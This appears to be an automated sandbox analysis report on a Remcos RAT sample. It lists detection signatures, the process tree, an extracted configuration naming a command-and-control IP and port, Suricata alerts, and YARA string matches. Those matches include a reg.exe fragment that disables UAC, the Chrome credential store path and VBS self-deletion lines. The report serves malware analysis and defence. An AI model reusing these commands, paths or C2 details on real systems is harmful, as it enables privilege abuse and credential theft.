
Windows Analysis Report
Rgh99876k7e.exe

Overview

General Information

Sample name: Rgh99876k7e.exe
Analysis ID: 1503444
MD5: bd6420aaf066a5b4533598417866bc67
SHA1: cf56376da61f4f34034fa4cc525e708052a5ecd3
SHA256: b8022e8002a8e01a6364fdcc6d53275b6edf3d196e36f0b4c9645de2570cfd48
Tags: exe

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connections (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • Rgh99876k7e.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\Rgh99876k7e.exe" MD5: BD6420AAF066A5B4533598417866BC67)
    • antholite.exe (PID: 6364 cmdline: "C:\Users\user\Desktop\Rgh99876k7e.exe" MD5: BD6420AAF066A5B4533598417866BC67)
      • antholite.exe (PID: 4180 cmdline: C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\hrwdimdtylblmzmsnycdtxncbowjm" MD5: BD6420AAF066A5B4533598417866BC67)
      • antholite.exe (PID: 4332 cmdline: C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\sljoieovmttyofawejoeebhlbcosfxea" MD5: BD6420AAF066A5B4533598417866BC67)
      • antholite.exe (PID: 6188 cmdline: C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\cnoh" MD5: BD6420AAF066A5B4533598417866BC67)
  • wscript.exe (PID: 2072 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • antholite.exe (PID: 6444 cmdline: "C:\Users\user\AppData\Local\Cocles\antholite.exe" MD5: BD6420AAF066A5B4533598417866BC67)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware configuration:
{"Host:Port:Password": "192.210.150.26:8787:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-NKQ1SM", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | -

Source | Rule | Description | Author | Strings
00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | -
00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | -
00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | -
00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | -
00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
Source | Rule | Description | Author | Strings
2.2.antholite.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | -
2.2.antholite.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | -
2.2.antholite.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | -
2.2.antholite.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6aab8:$a1: Remcos restarted by watchdog!
  • 0x6b030:$a3: %02i:%02i:%02i:%03i
2.2.antholite.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b7c:$str_b2: Executing file:
  • 0x65bfc:$str_b3: GetDirectListeningPort
  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65728:$str_b7: \update.vbs
  • 0x64ba4:$str_b9: Downloaded file:
  • 0x64b90:$str_b10: Downloading file:
  • 0x64c34:$str_b12: Failed to upload file:
  • 0x65bc4:$str_b13: StartForward
  • 0x65be4:$str_b14: StopForward
  • 0x65680:$str_b15: fso.DeleteFile "
  • 0x65614:$str_b16: On Error Resume Next
  • 0x656b0:$str_b17: fso.DeleteFolder "
  • 0x64c24:$str_b18: Uploaded file:
  • 0x64be4:$str_b19: Unable to delete:
  • 0x65648:$str_b20: while fso.FileExists("
  • 0x650c1:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , ProcessId: 2072, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , ProcessId: 2072, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Cocles\antholite.exe, ProcessId: 6364, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Cocles\antholite.exe, ProcessId: 6364, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata IDS alerts:

Timestamp | SID | Severity | Source Port | Destination Port | Protocol | Classtype
2024-09-03T15:24:07.703909+0200 | 2032777 | 1 | 8787 | 49704 | TCP | Malware Command and Control Activity Detected
2024-09-03T15:24:08.739478+0200 | 2803304 | 3 | 49706 | 80 | TCP | Unknown Traffic
2024-09-03T15:24:06.612948+0200 | 2032776 | 1 | 49704 | 8787 | TCP | Malware Command and Control Activity Detected
2024-09-03T15:26:14.817228+0200 | 2032777 | 1 | 8787 | 49704 | TCP | Malware Command and Control Activity Detected


AV Detection

Source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "192.210.150.26:8787:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-NKQ1SM", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | ReversingLabs: Detection: 63%
Source: Rgh99876k7e.exe | ReversingLabs: Detection: 63%
Source: Yara match | File source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4551244504.0000000003DFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2168391666.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4550751358.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4550520256.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2233512989.0000000001904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2169326996.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2141891064.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Joe Sandbox ML: detected
Source: Rgh99876k7e.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,2_2_004338C8
Source: antholite.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match | File source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00407538 _wcslen,CoGetObject,2_2_00407538
Source: Rgh99876k7e.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0076DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0076DBBE
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0073C2A2 FindFirstFileExW,0_2_0073C2A2
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_007768EE FindFirstFileW,FindClose,0_2_007768EE
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0077698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0077698F
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0076D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0076D076
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0076D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0076D3A9
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00779642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00779642
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0077979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0077979D
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00779B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00779B2B
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00775C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00775C97
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_0040928E
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041C322
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040C388
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_004096A0
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_00408847
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00407877 FindFirstFileW,FindNextFileW,2_2_00407877
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0044E8F9 FindFirstFileExA,2_2_0044E8F9
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040BB6B
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00419B86
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040BD72
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_008FDBBE
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008CC2A2 FindFirstFileExW,2_2_008CC2A2
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_009068EE FindFirstFileW,FindClose,2_2_009068EE
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0090698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_0090698F
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_008FD076
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_008FD3A9
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00909642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00909642
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0090979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0090979D
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00909B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00909B2B
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00905C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00905C97
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_100010F1
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_10006580 FindFirstFileExA,2_2_10006580
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_008CC2A2 FindFirstFileExW,3_2_008CC2A2
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_009068EE FindFirstFileW,FindClose,3_2_009068EE
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_0090698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_0090698F
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_008FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_008FD076
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_008FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_008FD3A9
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_00909642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00909642
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_0090979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0090979D
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_008FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_008FDBBE
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_00909B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00909B2B
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_00905C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00905C97
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_00407CD2

Networking

Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49704 -> 192.210.150.26:8787
Source: Network traffic | Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 192.210.150.26:8787 -> 192.168.2.5:49704
Source: Malware configuration extractor | URLs: 192.210.150.26
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1, Host: geoplugin.net, Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49706 -> 178.237.33.50:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0077CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0077CE44
Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: antholite.exe, 00000003.00000003.2160163689.000000000172D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
